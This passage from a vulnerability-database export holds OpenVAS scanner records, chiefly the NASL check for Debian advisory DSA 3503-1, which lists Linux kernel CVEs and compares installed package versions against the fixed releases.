isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.73-2+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:16", "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service, information\nleak or data loss.\n\nCVE-2013-4312 \nTetsuo Handa discovered that users can use pipes queued on local\n(Unix) sockets to allocate an unfair share of kernel memory, leading\nto denial-of-service (resource exhaustion).\n\nThis issue was previously mitigated for the stable suite by limiting\nthe total number of files queued by each user on local sockets. The\nnew kernel version in both suites includes that mitigation plus\nlimits on the total size of pipe buffers allocated for each user.\n\nCVE-2015-7566 \nRalf Spenneberg of OpenSource Security reported that the visor\ndriver crashes when a specially crafted USB device without bulk-out\nendpoint is detected.\n\nCVE-2015-8767 \nAn SCTP denial-of-service was discovered which can be triggered by a\nlocal attacker during a heartbeat timeout event after the 4-way\nhandshake.\n\nCVE-2015-8785 \nIt was discovered that local users permitted to write to a file on a\nFUSE filesystem could cause a denial of service (unkillable loop in\nthe kernel).\n\nCVE-2015-8812 \nA flaw was found in the iw_cxgb3 Infiniband driver. Whenever it\ncould not send a packet because the network was congested, it would\nfree the packet buffer but later attempt to send the packet again.\nThis use-after-free could result in a denial of service (crash or\nhang), data loss or privilege escalation.\n\nCVE-2015-8816 \nA use-after-free vulnerability was discovered in the USB hub driver.\nThis may be used by a physically present user for privilege\nescalation.\n\nCVE-2015-8830 \nBen Hawkes of Google Project Zero reported that the AIO interface\npermitted reading or writing 2 GiB of data or more in a single\nchunk, which could lead to an integer overflow when applied to\ncertain filesystems, socket or device types. The full security\nimpact has not been evaluated.\n\nCVE-2016-0723 \nA use-after-free vulnerability was discovered in the TIOCGETD ioctl.\nA local attacker could use this flaw for denial-of-service.\n\nCVE-2016-0774It was found that the fix for CVE-2015-1805 \nin kernel versions older\nthan Linux 3.16 did not correctly handle the case of a partially\nfailed atomic read. A local, unprivileged user could use this flaw\nto crash the system or leak kernel memory to user space.\n\nCVE-2016-2069 \nAndy Lutomirski discovered a race condition in flushing of the TLB\nwhen switching tasks on an x86 system. On an SMP system this could\npossibly lead to a crash, information leak or privilege escalation.\n\nCVE-2016-2384 \nAndrey Konovalov found that a crafted USB MIDI device with an\ninvalid USB descriptor could trigger a double-free. This may be used\nby a physically present user for privilege escalation.\n\nCVE-2016-2543 \nDmitry Vyukov found that the core sound sequencer driver (snd-seq)\nlacked a necessary check for a null pointer, allowing a user\nwith access to a sound sequencer device to cause a denial-of service (crash).\n\nCVE-2016-2544, CVE-2016-2546, CVE-2016-2547, CVE-2016-2548 \nDmitry Vyukov found various race conditions in the sound subsystem\n(ALSA)", "cvss3": {}, "published": "2016-03-08T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3503-1 (linux - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2069", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-0774", "CVE-2016-2547", "CVE-2015-8812", "CVE-2016-2544", "CVE-2015-8830", "CVE-2016-2550", "CVE-2016-2545", "CVE-2015-8767", "CVE-2013-4312", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2015-8816", "CVE-2015-8785", "CVE-2015-1805"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703503", "href": "http://plugins.openvas.org/nasl.php?oid=703503", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3503.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3503-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703503);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-1805\", \"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2015-8785\", \"CVE-2015-8812\", \"CVE-2015-8816\", \"CVE-2015-8830\", \"CVE-2016-0723\", \"CVE-2016-0774\", \"CVE-2016-2069\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2550\");\n script_name(\"Debian Security Advisory DSA 3503-1 (linux - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-08 12:37:38 +0530 (Tue, 08 Mar 2016)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3503.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"linux on Debian Linux\");\n script_tag(name: \"insight\", value: \"The Linux kernel is the core of the Linux operating system.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy), these problems have been fixed\nin version 3.2.73-2+deb7u3. The oldstable distribution (wheezy) is not\naffected by CVE-2015-8830 \n.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 3.16.7-ckt20-1+deb8u4. CVE-2015-7566, CVE-2015-8767 and\nCVE-2016-0723 were already fixed in DSA-3448-1. CVE-2016-0774 \ndoes not\naffect the stable distribution.\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service, information\nleak or data loss.\n\nCVE-2013-4312 \nTetsuo Handa discovered that users can use pipes queued on local\n(Unix) sockets to allocate an unfair share of kernel memory, leading\nto denial-of-service (resource exhaustion).\n\nThis issue was previously mitigated for the stable suite by limiting\nthe total number of files queued by each user on local sockets. The\nnew kernel version in both suites includes that mitigation plus\nlimits on the total size of pipe buffers allocated for each user.\n\nCVE-2015-7566 \nRalf Spenneberg of OpenSource Security reported that the visor\ndriver crashes when a specially crafted USB device without bulk-out\nendpoint is detected.\n\nCVE-2015-8767 \nAn SCTP denial-of-service was discovered which can be triggered by a\nlocal attacker during a heartbeat timeout event after the 4-way\nhandshake.\n\nCVE-2015-8785 \nIt was discovered that local users permitted to write to a file on a\nFUSE filesystem could cause a denial of service (unkillable loop in\nthe kernel).\n\nCVE-2015-8812 \nA flaw was found in the iw_cxgb3 Infiniband driver. Whenever it\ncould not send a packet because the network was congested, it would\nfree the packet buffer but later attempt to send the packet again.\nThis use-after-free could result in a denial of service (crash or\nhang), data loss or privilege escalation.\n\nCVE-2015-8816 \nA use-after-free vulnerability was discovered in the USB hub driver.\nThis may be used by a physically present user for privilege\nescalation.\n\nCVE-2015-8830 \nBen Hawkes of Google Project Zero reported that the AIO interface\npermitted reading or writing 2 GiB of data or more in a single\nchunk, which could lead to an integer overflow when applied to\ncertain filesystems, socket or device types. The full security\nimpact has not been evaluated.\n\nCVE-2016-0723 \nA use-after-free vulnerability was discovered in the TIOCGETD ioctl.\nA local attacker could use this flaw for denial-of-service.\n\nCVE-2016-0774It was found that the fix for CVE-2015-1805 \nin kernel versions older\nthan Linux 3.16 did not correctly handle the case of a partially\nfailed atomic read. A local, unprivileged user could use this flaw\nto crash the system or leak kernel memory to user space.\n\nCVE-2016-2069 \nAndy Lutomirski discovered a race condition in flushing of the TLB\nwhen switching tasks on an x86 system. On an SMP system this could\npossibly lead to a crash, information leak or privilege escalation.\n\nCVE-2016-2384 \nAndrey Konovalov found that a crafted USB MIDI device with an\ninvalid USB descriptor could trigger a double-free. This may be used\nby a physically present user for privilege escalation.\n\nCVE-2016-2543 \nDmitry Vyukov found that the core sound sequencer driver (snd-seq)\nlacked a necessary check for a null pointer, allowing a user\nwith access to a sound sequencer device to cause a denial-of service (crash).\n\nCVE-2016-2544, CVE-2016-2546, CVE-2016-2547, CVE-2016-2548 \nDmitry Vyukov found various race conditions in the sound subsystem\n(ALSA)'s management of timers. A user with access to sound devices\ncould use these to cause a denial-of-service (crash or hang) or\npossibly for privilege escalation.\n\nCVE-2016-2545 \nDmitry Vyukov found a flaw in list manipulation in the sound\nsubsystem (ALSA)'s management of timers. A user with access to sound\ndevices could use this to cause a denial-of-service (crash or hang)\nor possibly for privilege escalation.\n\nCVE-2016-2549 \nDmitry Vyukov found a potential deadlock in the sound subsystem\n(ALSA)'s use of high resolution timers. A user with access to sound\ndevices could use this to cause a denial-of-service (hang).\n\nCVE-2016-2550The original mitigation of CVE-2013-4312 \n, limiting the total number\nof files a user could queue on local sockets, was flawed. A user\ngiven a local socket opened by another user, for example through the\nsystemd socket activation mechanism, could make use of the other\nuser's quota, again leading to a denial-of-service (resource\nexhaustion). This is fixed by accounting queued files to the sender\nrather than the socket opener.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-s390\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-arm64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mips\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mipsel\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-powerpc\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-ppc64el\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-s390x\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-arm64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2e\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-3\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc-smp\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64le\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-s390x\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64-dbg\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2e\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-3\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc-smp\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64le\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x-dbg\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.7-ckt20-1+deb8u4\", 